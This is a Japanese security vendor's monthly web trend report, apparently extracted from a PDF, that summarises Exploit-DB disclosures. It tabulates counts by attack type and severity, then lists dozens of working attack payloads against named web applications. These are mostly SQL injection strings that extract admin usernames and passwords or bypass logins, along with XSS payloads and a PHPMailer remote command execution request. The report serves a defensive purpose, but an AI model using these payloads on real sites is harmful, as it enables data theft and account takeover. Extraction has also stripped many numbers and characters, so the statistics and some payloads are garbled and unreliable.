最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開さ

Transcription

1 07.0

2 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です サマリー ペンタセキュリティシステムズ株式会社 R&D センターデータセキュリティチーム 07 年 月に公開された Exploit-DB の脆弱報告件数は 平均的に 他の期間の数よりも 4 倍ほど多かったです これは のように 特定の目的に合わせてパッケージ化されている に対したが多く発見されたからです これらの は 有料サービスで購入して使用され 購入したサイトから特定の に対したが発見されると ほとんどの でもが発見される形式で報告されました で発見されたは ほとんどが SQL インジェクション関連でした 該当のは 攻撃に成功するかどうかを確認する単純なクエリではなく 実際に DB データを抽出するクエリで構成されていて 危険度と難易度の高いでした が発見された を使用する管理者は 該当のの内容を必ず確認し 入力内容をを厳密に検証するセキュアコーディングおよび関連アップデートを実施して がさらされないように注意する必要があります. 別件数カテゴリ件数リモートコマンドインジェクション (Remote Command Execution) 特権昇格 (Privilege Escalation) コードインジィクション (Code Injection) クロスサイトスクリプティング 7 (Cross Site ing : XSS) SQL インジェクション 7 (SQL Injection) 合計 別件数 リモートコマンドインジェクション 特権昇格 コードインジィクション (Remote Command (Privilege Escalation) (Code Injection) 7 クロスサイトスクリプティング (Cross Site ing : XSS) 7 SQL インジェクション (SQL Injection) Execution). 危険度別件数 危険度 件数 割合 早急対応要 8.6% 高 % 合計 % 険度別件数 早急対応要 高 5. 攻撃実行の難易度別件数難易度 件数 割合 難 % 中 5 7.0% 易 06 7.% 合計 % 攻撃実行の難易度別件数 難 中 易 4. 主なソフトウェア別発生件数ソフトウェア名件数 Builder 4 MC Smart Shop Yoga and Fitness Website Website Wordpress Plus PHPBack Manufacturer Website Design My Link Trader Itech Classifieds Directory Itech Real Estate Starting Page Online Printing Clone Networking Online Mobile Recharge Dentist Website Professional Service Booking BB MC Yellow Pages My Php Dating MC Buy and Sell Cars Itech Dating Study Abroad Website Shiksha Website Questions and Answers Joomla Vine VideoSite Creator Itech News Portal Clone of Oddee Openexpert Blackboard LMS PHPMailer Open Source Real-Estate Online Food Delivery MC Documentation Creator Complain Management System MC Inventory Manager Maian Weblog Atlassian Confluence Itech Auction Friends in War Make or Break Itech Freelancer Splunk Online Tshirt Design e-soft4 Jokes Portal Seo Viral School Management Software Job Vacancy itechscripts Freelancer 5. BB Alibaba Clone BoZoN My Photo Gallery Auction Website Online Hotel Booking System Pro Finance Website Caregiver Buy and Sell Market Place Software Itech BB Home of Viral Images Dating Video Site Creator Itech Multi Vendor Classifieds Viral Image & GagZone HelpDeskZ Image and Video Social News and Bookmarking 合計 47 主なソフトウェア別発生件数 Builder

3 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 Remote Command Execution 中 早急対応要 HPMailer < 5..0 / SwiftMailer < DEV / Zend Framework / zend-mail <.4. - Remote Commec Execution POST /contact_forms.php HTTP/. action=send&name=name& ="attacker\\\\\\\\" - oq/tmp/ -Xcache/exploit.php anything"@ .com&msg=<? phpinfo();?> PHPMailer PHPMailer < 5..0 / SwiftMailer <= DEV / Zend Framework / zend-mail < XSS 易高 Atlassian Confluence /pages/ XSS POST /pages/doeditattachment.action?pageid={pageid}&attachment Bean.fileName={filename} HTTP/. Atlassian Confluence Atlassian Confluence 5.9. atl_token={atl_token}&pageid={pageid}&isfrompageview=false &newfilename=<script>alert()</script>file&newcomment=&n ewcontenttype=application%foctetstream&newparentpage=&confirm=save XSS 中高 Splunk /en-us/app/ XSS GET /en-us/app/ HTTP/. Referer: javascript:prompt("xxs by justpentest"); Splunk Splunk SQL Injection 易高 My Link Trader. - SQL Injection POST /admin/login.php HTTP/. My Link Trader My Link Trader. Username='or''='&Password= SQL Injection 中高 Plus / SQL /Report.do?methodToCall=generateReport&action=Generate& domains=dc=acme,dc=local&&attrid=00&attrtabname=; %0SELECT%0pg_sleep(00);%0-- &attrbcolname=computer_name&attrbdispname=compute r%0name Plus Plus XSS 中高 Plus / XSS /ObjectProperties.do?selectedTab=home&guid={06C4EE- 5D8-48-AD9-05B66F0BA6}&domainName=4'%balert()%f%f 66dlgck5&selectedObjectTab=properties&reportProperties=obj ectproperties&objectclass=computer&adscsrf=b59a7c-4cf4-4fc-95e4-bfe4f7677a Plus Plus XSS 易高 Plus /jsp/reports/exportreport.jsp?reportlist=true&reportid=4&wa ExportReport.jsp XSS 脆弱 adaccid=/'onload='alert(9) Plus Plus POST /webapps/bb-sites-user-profile-bblearn/profile.form HTTP/ XSS 中高 Blackboard LMS 9. SP4 - /webapps/bb-sites-user-profile- BBLEARN/ XSS uservo.firstname=%cimg+src%dx+onerror%dprompt% 84%9%E&userVO.lastName=%Cimg+src%Dx+onerror% Dprompt%84%9%E&userVO.user.educationLevel=Not+ Disclosed&userVO.user.gender=Not+Disclosed&birthDate_date time=&pickdate=&pickname=&birthdate_date=&uservo.user.s tudentid=&usertype=he_student&uservo.user. address =sec%40secteach.me&uservo.user.street=&uservo.user.city =&uservo.user.state=&uservo.user.zipcode=&uservo.user.co untry=af&uservo.user.mobilephone=&uservo.user.homephon e=&uservo.user.webpage=&uservo.userprofile.institutiongui d=user_instr_05-0- _9%A%A.04&userVO.user.jobTitle=&userVO.user.department=&top_Submit=Submit Blackboard LMS Blackboard LMS 9. SP4

4 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難早急対応要 My Php Dating.0 - view_image.php SQL /view_image.php?path=- 4+union+select+,group_concat(column_name),,4,5,6,7,8, 9+from+information_schema.columns+where+table_schema= My Php Dating database()-- My Php Dating SQL Injection 易高 SQL Injection 中高 SQL Injection 易高 My Php Dating.0 - /view_profile.php?id=%0and%0=-- view_profile.php SQL Friends in War Make or Break.7 - index.php SQL Starting Page. - outgoing.php SQL /index.php?imgid= union+all+select+null,null,null,null,version(),null-- /outgoing.php?linkid=%0and%0=-- My Php Dating Friends in War Make or Break Starting Page My Php Dating.0 Friends in War Make or Break.7 Starting Page Privilege Escalation 易 高 WordPress Plugin WP Support Plus Responsive Ticket System admin-ajax.php Privilege Escalation POST /wp-admin/admin-ajax.php HTTP/. username=administrator& =sth&action=loginguestfacebo ok Wordpress WordPress Plugin WP Support Plus Responsive Ticket System SQL Injection 易 高 SQL Injection 中 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 School Management Software.75 - notice-edit.php SQL /notice-edit.php?aid=%0and%0=-- /category.php?sk=itechscripts Freelancer union+all+select+null,null,group_concat(username,char( - category.php SQL 58),password),null+from/**/admin_user /movie.php?f=%0and%0=-- movie.php SQL 9. - /hotel.php?id=%0and%0=-- hotel.php SQL 9. - /holiday.php?id=%0and%0=-- holiday.php SQL School Management Software itechscripts Freelancer 5. School Management Software.75 itechscripts Freelancer SQL Injection 難高 Starting Page. - link_req_.php SQL POST /link_req_.php HTTP/. category=' AND (select from(select count(*),concat((select(select(select concat(0x7e,0x7,username,0xa,password,0x7,0x7e)from sp_admin limit 0,))from information_schema.tables limit 0,),floor(rand(0)*))x from information_schema.tables group by x)a) AND 'a'='a&name=abc& =admin@admin.com&url= m&description=helloworld Starting Page Starting Page SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 My link trader. - out.php SQL 9. - pages.php SQL artist.php SQL Dating.5 - see_more_details.php SQL /out.php?id=%0and%0=-- /pages.php?id=%0and%0=-- /artist.php?a=%0and%0=-- /see_more_details.php?id=%0and%0=-- My link trader Dating My link trader Dating SQL Injection 易高 Job Portal 9. - index.php SQL POST /admin/index.php HTTP/. xploitdb.com/exploit s/408/ Job Portal 9. Username=admin&Password=' or ''=' SQL Injection 易高 Online Food Delivery.04 - Authentication Bypass POST /admin/admin_login.php HTTP/. Online Food Delivery Online Food Delivery.04 Username=' or =--&Password=anything SQL Injection 易高 SQL Injection 易高 Professional Service Booking - best_pro_details.php SQL /best_pro_details.php?service_id=%0and%0=-- Professional Service Booking /content.php?page=%0and%0=-- - content.php SQL Professional Service Booking Professional Service Booking Professional Professional Service Service Booking Booking

5 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 Open Source Real-Estate - viewpropertydetails.php SQL /viewpropertydetails.php?id=%0and%0=-- MC Documentation Creator /admin/dashboard.php?doc=%0and%0=-- - dashboard.php SQL MC Inventory Manager - dashboard.php SQL MC Yellow Pages - category.php SQL MC Buy and Sell Cars. - cateogry.php SQL MC Smart Shop - product.php SQL /dashboard.php?p=view_sell&id=%0and%0=-- /category.php?list_id=%0and%0=-- /cateogry.php?p=search&cage=all&manufacturer=%0and% 0=-- /product.php?p=%0and%0=-- Open Source Real-Estate Open Source Real-Estate MC MC Documentation Documentation Creator Creator MC Inventory MC Inventory Manager Manager MC Yellow Pages MC Buy and Sell Cars MC Smart Shop MC Yellow Pages MC Buy and Sell Cars. MC Smart Shop SQL Injection 易高 POST /adminlogin.php HTTP/. MC Smart Shop - adminlogin.php SQL Injection 脆弱 MC Smart Shop MC Smart Shop Main=@.com&Password='or''=' SQL Injection 易高 POST /siteadmin/ HTTP/. e-soft4 Jokes Portal Seo. - /siteadmin/ SQL Injection 脆弱 e-soft4 Jokes Portal Seo e-soft4 Jokes Portal Seo. Username=anything&Password='or''=' SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 MC Smart Shop - /category.php?id=%0and%0=-- category.php SQL MC Buy and Sell Cars. - car.php SQL MC Yellow Pages - details.php SQL /car.php?c=%0and%0=-- /details.php?list_id=%0and%0=-- MC Smart Shop MC Buy and Sell Cars MC Yellow Pages MC Smart Shop MC Buy and Sell Cars. MC Yellow Pages SQL Injection 中高 4. - list_temp_photo_pin_upload.php SQL /list_temp_photo_pin_upload.php?pid='%0and%0(select %0674%0FROM(SELECT%0COUNT(*),CONCAT(0x77a 7767,(SELECT%0(ELT(674=674,))),0x77a6a6b7,FLO OR(RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.CH ARACTER_SETS%0GROUP%0BY%0x)a)%0AND%0'xvt H'='xvtH SQL Injection 難早急対応要 /categorypage.php?token=%7+and+(select+674+from( SELECT+COUNT(*)%CCONCAT(0x77a7767%C(SELECT +(ELT(674%D674%C)))%C0x77a6a6b7%CFLOOR (RAND(0)*))x+FROM+INFORMATION_SCHEMA.CHARACTER_ SETS+GROUP+BY+x)a)+AND+%7xvtH%7%D%7xvtH&o 4. - q=%7+and+(select+674+from(select+count(*)%c categorypage.php SQL Injection 脆 CONCAT(0x77a7767%C(SELECT+(ELT(674%D674% 弱 # C)))%C0x77a6a6b7%CFLOOR(RAND(0)*))x+FROM+I NFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)+ AND+%7xvtH%7%D%7xvtH&aqs=chrome..69i57.447j0j 4&sourceid=chrome&ie=UTF XSS 中高 4. - categorypage.php XSS POST /categorypage.php HTTP/. 4. token="><img src=i onerror=prompt()> XSS 中高 4. - postcomment.php XSS POST /ajax-files/postcomment.php HTTP/. 4. text=<img src=i onerror=prompt()>

6 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難早急対応要 4. - postcomment.php SQL Injection POST /ajax-files/postcomment.php HTTP/. id=%7%0and%0(select%0674%0from(select% 0COUNT(*),CONCAT(0x77a7767,(SELECT%0(ELT(674 =674,))),0x77a6a6b7,FLOOR(RAND(0)*))x%0FROM% 0INFORMATION_SCHEMA.CHARACTER_SETS%0GROUP% 0BY%0x)a)%0AND%0%7xvtH%7=%7xvtH SQL Injection 難早急対応要 POST /ajax-files/followboard.php HTTP/ followboard.php SQL Injection 脆弱 brdid=' AND (SELECT 674 FROM(SELECT COUNT(*),CONCAT(0x77a7767,(SELECT (ELT(674=674,))),0x77a6a6b7,FLOOR(RAND(0)*))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xvth'='xvth XSS 中高 Networking 8. - home.php XSS POST /home.php HTTP/. Networking Networking 8. first_name='"--></style></><>alert()</> SQL Injection 易高 XSS 中高 Networking 8. - show_group_members.php SQL 4. - searchpin.php XSS /show_group_members.php?gid=%7%0or%7%7=% 7 POST /searchpin.php HTTP/. Networking Networking q="><img src=i onerror=prompt()> Code Injection 中高 BoZoN.4 - Remote Code Execution POST /index.php HTTP/. BoZoN BoZoN.4 creation=&login="];$pwn=''phpinfo();//''//"&pass=abc&c onfirm=abc&token= SQL Injection 難早急対応要 Openexpert expert_wizard.php SQL /expert_wizard.php?area_id=%0and%0(select%08855 %0FROM(SELECT%0COUNT(*),CONCAT(0x77706a7,(S ELECT%0(ELT(8855=8855,))),0x766b787,FLOOR(RAND( 0)*))x%0FROM%0INFORMATION_SCHEMA.PLUGINS%0 GROUP%0BY%0x)a)%0Type:%0AND/OR%0timebased%0blind%0Title:%0MySQL%0>=%05.0.%0A ND%0timebased%0blind%0Payload:%0area_id=%0AND%0SLEE P(5)%0---%0[5:5:8]%0[INFO]%0the%0backend%0DBMS%0is%0MySQL%0web%0server%0oper ating%0system:%0windows%0web%0application%0t echnology:%0apache%0.4.,%0php%05.6.6%0ba ckend%0dbms:%0mysql%0>=%05.0%0[5:5:8]% 0[INFO]%0fetching%0database%0names%0[5:5:9] %0[INFO]%0the%0SQL%0query%0used%0returns% 05%0entries%0[5:5:9]%0[INFO]%0retrieved:%0i nformation_schema%0[5:5:9]%0[info]%0retrieved: %0mysql%0[5:5:9]%0[INFO]%0retrieved:%0perfor mance_schema%0[5:5:9]%0[info]%0retrieved:%0s ys%0[5:5:9]%0[info]%0retrieved:%0test Openexpert Openexpert SQL Injection 中高 BB search.php SQL /search.php?keywords=products%7)%0union%0all%0 SELECT%0NULL,CONCAT(0x76b7a787,0x e6b b487a4564c696646e e a5a6a7a4c4c,0x7767a7a7)# BB BB 4.7

7 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 中高 BB catcompany.php SQL /catcompany.php?token=747%7%0union%0all%0se LECT%0NULL,CONCAT(0x ,0x6a6c6d484f5876 e a a64a70 4f4b79647a494654,0x76b7867),NULL,NULL,NULL,NULL-- anxq BB BB SQL Injection 易高 - /admin_new/ SQL POST /admin_new/ HTTP/. Username='or''='&Password=anything SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 - category.entryform.php SQL /admin_new/category.entryform.php?cat_id=%0and%0= -- - /admin_new/page.editor.php?id=%0and%0=-- page.editor.php SQL Study Abroad Website /admin/list_blogs.php?mpid=%0and%0=-- - list_blogs.php SQL Study Abroad Website /admin/list_listing.php?mpid=%0and%0=-- - list_listing.php SQL Shiksha Website /admin/member.regform.php?user_id=%0and%0=-- - member.regform.php SQL Shiksha Website /admin/subject_add.php?id=%0and%0=-- - subject_add.php SQL Online Tshirt Design - /admin/product.new.add.php?id=%0and%0=-- product.new.add.php SQL Online Printing Clone /product-decs.php?cat_id=%0and%0=-- - product-decs.php SQL Online Printing Clone /admin/product.entryform.php?product_id=%0and%0= - product.entryform.php -- SQL Clone of Oddee.. - search.php SQL /search.php?term=%0and%0=-- Online Mobile Recharge - /admin/user_edit.php?id=%0and%0=-- user_edit.php SQL Online Mobile Recharge - /admin/page.editor.php?id=%0and%0=-- page.editor.php SQL Questions and Answers /question.php?id=%0and%0= question.php SQL Injection Questions and Answers /category.php?id=%0and%0= category.php SQL Injection - /admin/addnew.event.php?id=%0and%0=-- addnew.event.php SQL - /admin/add_new_photo.php?id=%0and%0=-- add_new_photo.php SQL Injection - /admin/add_new_project.php?id=%0and%0=-- add_new_project.php SQL - /admin/add_new_video.php?id=%0and%0=-- add_new_video.php SQL Injection - /admin/addnew.activity.php?id=%0and%0=-- addnew.activity.php SQL Injection - addblog.php /admin/addblog.php?id=%0and%0=-- SQL Yoga and Fitness Website - /promo_classes.php?cid=%0and%0=-- promo_classes.php SQL Injection Yoga and Fitness Website - style.php SQL /style.php?s=%0and%0=-- Yoga and Fitness Website - /teacherindi.php?t=%0and%0=-- teacherindi.php SQL - /admin/add_country.php?countryid=%0and%0=-- add_country.php SQL - /admin/details_religios.html?project_id=%0and%0=-- details_religios.html SQL Injection - /admin/cities_add.php?cityid=%0and%0=-- cities_add.php SQL - request_add.php SQL - good_category_add.php SQL - details.html SQL /admin/request_add.php?request_id=%0and%0=-- /admin/good_category_add.php?goods_cat_id=%0and%0 =-- /admin/details.html?project_id=%0and%0=-- Study Abroad Website Study Abroad Website Shiksha Website Shiksha Website Online Tshirt Design Study Abroad Website Study Abroad Website Shiksha Website Shiksha Website Online Tshirt Design Online Printing Online Printing Clone Clone Online Printing Clone Clone of Oddee Online Printing Clone Clone of Oddee.. Online Mobile Online Mobile Recharge Recharge Online Mobile Online Mobile Recharge Recharge Questions and Answers Questions and Answers Questions and Answers.. Questions and Answers.. Yoga and Yoga and Fitness Website Fitness Website Yoga and Yoga and Fitness Website Fitness Website Yoga and Yoga and Fitness Website Fitness Website

8 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 Builder /join_class.php?course_id=%0and%0=-- - join_class.php SQL Builder /admin/add_cat.php?id=%0and%0=-- - add_cat.php SQL Injection Builder /admin/add_subcat.php?id=%0and%0=-- - add_subcat.php SQL Builder /find_group_class.php?cat_id=%0and%0=-- - find_group_class.php SQL # - security.php /backoffice/security.php?act=edit_cat&id=%0and%0=-- SQL - /backoffice/blog_category.php?act=edit_cat&blog_category_id blog_category.php SQL Injection 脆 =%0and%0=-- 弱 /backoffice/photo.php?act=edit_cat&photo_id=%0and%0 =-- - photo.php SQL - video.php SQL - banner_list.php SQL Manufacturer Website Design - add_gallery.php SQL Manufacturer Website Design - add_product.php SQL /backoffice/video.php?act=edit_cat&video_id=%0and%0 =-- /backoffice/banner_list.php?act=edit_cat&banner_id=%0an d%0=-- /admin/add_gallery.php?id=%0and%0=-- /admin/add_product.php?prod_id=%0and%0=-- Builder Builder Builder Builder Builder Builder Builder Builder Manufacturer Manufacturer Website Design Website Design Manufacturer Manufacturer Website Design Website Design SQL Injection 易高 POST /admin/ HTTP/. Dentist Website - /admin_giant/ SQL Username='or''='&Password=anything Dentist Dentist Website Website SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 Dentist Website - /admin_giant/add_gallery.php?id=%0and%0=-- add_gallery.php SQL Directory - /admin/edit_member.php?status=y&id=%0and%0=-- edit_member.php SQL Directory - /admin/edit_review.php?id=%0and%0=-- edit_review.php SQL Website - /admin_giant/add_gallery.php?id=%0and%0=-- add_gallery.php SQL Website - /admin_giant/add_team_member.php?id=%0and%0=-- add_team_member.php SQL Dentist Dentist Website Website Directory Directory Website Website Directory Directory Website Website SQL Injection 易高 POST /admin_giant/ HTTP/. Website - /admin_giant/ SQL Username='or''='&Password=anything Website Website SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 SQL Injection 易 高 Auction Website - /news.dtl.php?id=%0and%0=-- news.dtl.php SQL Finance Website - /user.profile.php?uid=%0and%0=-- user.profile.php SQL Buy and Sell Market Place /admin_giant/page.editor.php?id=%0and%0=-- Software - page_editor.php SQL Home of Viral Images, Videos and Articles - search.php SQL /search.php?term=%0and%0=-- Video Site Creator - /search.php?term=%0and%0=-- search.php SQL Classifieds - search.php SQL /search.php?term=%0and%0=-- Viral Image & /search.php?term=%0and%0=-- GagZone - search.php SQL Image and Video - /search.php?term=%0and%0=-- search.php SQL Social News and Bookmarking /search.php?term=%0and%0=-- - search.php SQL Viral - search.php SQL Vine VideoSite Creator - search.php SQL Job Vacancy - search.php SQL /search.php?term=%0and%0=-- /search.php?term=%0and%0=-- /search.php?term=%0and%0=-- Auction Website Finance Website Buy and Sell Market Place Software Home of Viral Images Video Site Creator Classifieds Viral Image & GagZone Image and Video Social News and Bookmarking Viral Image Sharing Vine VideoSite Creator Job Vacancy Auction Website Finance Website Buy and Sell Market Place Software Home of Viral Images, Videos and Articles Video Site Creator Classifieds Viral Image & GagZone Image and Video Social News and Bookmarking Viral Image Sharing Vine VideoSite Creator Job Vacancy

9 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 難早急対応要 SQL Injection 中高 Complain Management System - process.php SQL injection /process.php?action=deletecust&cid= AND EXTRACTVALUE(894,CONCAT(0x5c,0x77706a7,(SELECT (ELT(894=894,))),0x76a6b67)) /category.php?industryid=- BB Alibaba Clone - +union+select+,,group_concat(table_name)+from+informa category.php SQL tion_schema.tables+where+table_schema=database()-- Complain Management System BB Alibaba Clone Complain Management System BB Alibaba Clone SQL Injection 難早急対応要 /show_news.php?id=%0and%0(select%0%0fro M(SELECT%0COUNT(*),CONCAT(0x7786b7a7,(SELECT% 7.6-0(ELT(=,))),0x77a6787,FLOOR(RAND(0)*))x% show_news.php SQL Injection 脆弱 0FROM%0INFORMATION_SCHEMA.CHARACTER_SETS%0 GROUP%0BY%0x)a) XSS 易高 movie.php XSS POST /movie.php HTTP/. 7.6 f=<img src=i onerror=prompt()> SQL Injection 難早急対応要 show_misc_video.php SQL /show_misc_video.php?id=%0and%0(select%0% 0FROM(SELECT%0COUNT(*),CONCAT(0x7786b7a7,(SEL ECT%0(ELT(=,))),0x77a6787,FLOOR(RAND(0) *))x%0from%0information_schema.character_se TS%0GROUP%0BY%0x)a) SQL Injection 難早急対応要 artistdisplay.php SQL /artistdisplay.php?act=%0union%0all%0select%0null,co NCAT(0x7706a787,0x6b704f d4857 6d486b4544a ,0x77a6a7a7),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL# SQL Injection 難早急対応要 filmrating.php SQL /filmrating.php?v=%0and%0(select%0%0from(sele CT%0COUNT(*),CONCAT(0x7786b7a7,(SELECT%0(ELT( =,))),0x77a6787,FLOOR(RAND(0)*))x%0FRO M%0INFORMATION_SCHEMA.CHARACTER_SETS%0GROU P%0BY%0x)a) SQL Injection 中高 PHPBack <.. - /home/search SQL POST /home/search HTTP/. PHPBack PHPBack <.. query=')%0aor%0aextractvalue(6678,concat(0x7e,(select%0 Auser()),0x7e))--%0A% XSS 易高 PHPBack <.. - /home/postidea XSS POST /home/postidea HTTP/. title="><script>alert(document.location);</script> PHPBack PHPBack < SQL Injection 中高 My Photo Gallery.0 - image.php SQL /image.php?imgid=%0union%0all%0select%0nul L%CNULL%CNULL%CNULL%CCONCAT(0x770767a7 %C0x d70594d a56f6 c496f4d4b6b646f774d64a64f5676e67%c0x76b766 b7)--%0a My Photo Gallery My Photo Gallery SQL Injection 中高 Maian Weblog / SQL Injection /blog/%7%0and%0(select%0995%0from(selec T%0COUNT(*)%CCONCAT(0x777a6a7%C(SELECT% 0(ELT(995%D995%C)))%C0x77a78767%CFLOOR (RAND(0)*))x%0FROM%0INFORMATION_SCHEMA.PLUGI NS%0GROUP%0BY%0x)a)%0AND%0%7AUvx%7 %D%7AUvx/second-blog.html Maian Weblog Maian Weblog SQL Injection 中高 WordPress Plugin WP Private Messages.0. - SQL Injection POST /wp-admin/admin-ajax.php HTTP/. Wordpress WordPress Plugin WP Private Messages.0. action=weu_my_action&filetitle=0 UNION SELECT CONCAT(name,char(58),slug) FROM wp_terms WHERE term_id=&temp_sel_key=select_temp

10 最新 Web トレンドレポート (07.0) ~07.0. Exploit-DB( より公開されている内容に基づいたトレンド情報です 日付 EDB 番号カテゴリ攻撃難度危険度名攻撃コード対象プログラム対象環境 SQL Injection 易高 SQL Injection 易高 SQL Injection 易高 Online Hotel Booking System Pro. - roomtype-details.php SQL WordPress Plugin Online Hotel Booking System Pro.0 - roomtype-details.php SQL Injection Joomla! Component JTAG Calendar / SQL Injection /roomtype-details.php?tid=%0and%0=-- /front/roomtype-details.php?tid=%0and%0=-- /?option=com_jtagcalendar&format=raw&noframe=&search= %0and%0=--&searchOnly= Online Hotel Booking System Pro Wordpress Joomla Online Hotel Booking System Pro. WordPress Plugin Online Hotel Booking System Pro.0 Joomla! Component JTAG Calendar XSS 易高 /admin/conferences/applycreate XSS POST /admin/conferences/applycreate HTTP/ topic=<script>alert(&apos;xss&apos;&#4;</script> XSS 易 高 XSS 易 高 XSS 易 高 XSS 易 高 XSS 易 高 SQL Injection 易 高 SQL Injection 中 高 /admin/conferences/get-all-status/?keys[]=<img src=j /admin/conferences/get-all-status/ onerror=confirm(5) > XSS /admin/conferences/list/ XSS /admin/group/list/ XSS /admin/conferences/list/?sort=status%6'%()%6%5<div ><ScRiPt%0>prompt(5)</ScRiPt> /admin/group/list/?checked_group_id=%7%0onmouseover =confirm(5)%0? /admin/ /admin/group?%7\><script>confirm("xss")</script> XSS /admin/conferences/list/?domxss=javascript:domxssexecutionsi /admin/conferences/list/ XSS 脆弱 nk(,"'\\"><script>alert("xss")</script> Caregiver.57 - /searchjob.php?sitterservice=%0and%0=-- searchjob.php SQL Itech Auction mcategory.php SQL /mcategory.php?mcid=-5980' UNION ALL SELECT CONCAT(0x7706b77,0x f4c778786f706c4b c6b645644c766b7755a ,0x77706a7)-- XAee Caregiver Itech Auction Caregiver.57 Itech Auction SQL Injection 難高 /catcompany.php?token=-44' UNION ALL SELECT Itech BB NULL,CONCAT(0x767a707,0x596a574756f catcompany.php SQL Injection 脆弱 f697a a a ,0x76b707a7),NULL,NULL,NULL,NULL-- JwUA --- Itech BB Itech BB SQL Injection 難高 Itech Classifieds subpage.php SQL /subpage.php?scat=5' UNION ALL SELECT CONCAT(0x ,0x6d4d4d c b4a6f44d f476c a 7558,0x76b76767),NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES Itech Classifieds Itech Classifieds SQL Injection 難高 Itech Dating.6 - see_more_details.php SQL /see_more_details.php?id=40 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x77a7a6a7,0x a e6c6596f6f6586e54e544b5656b e704e ,0x76a667),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Itech Dating Itech Dating SQL Injection 難高 Itech Freelancer 5. - category.php SQL /category.php?sk=') UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x ,0x4c4d44a4 d b e494a a6d757a47454c69 7a4e c4646e4765,0x776b707),NULL,NULL,NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NUL L,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL-- Itech Freelancer Itech Freelancer SQL Injection 中高 Itech Multi Vendor product-list.php SQL /product-list.php?pl=-569' UNION ALL SELECT CONCAT(0x76b6a787,0x757485a76b a b a657656d6a5a6c65 6f47,0x770677),NULL,NULL,NULL,NULL# Itech Multi Vendor Itech Multi Vendor SQL Injection 中高 /information.php?inf=- 695%0UNION%0ALL%0SELECT%0CONCAT(0x76a78 Itech News Portal ,0x c6e6b4774b c information.php SQL Injection 脆弱 74a f4d496e54e f786f,0x ),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,N ULL,NULL,NULL--%0trhS Itech News Portal Itech News Portal 6.8

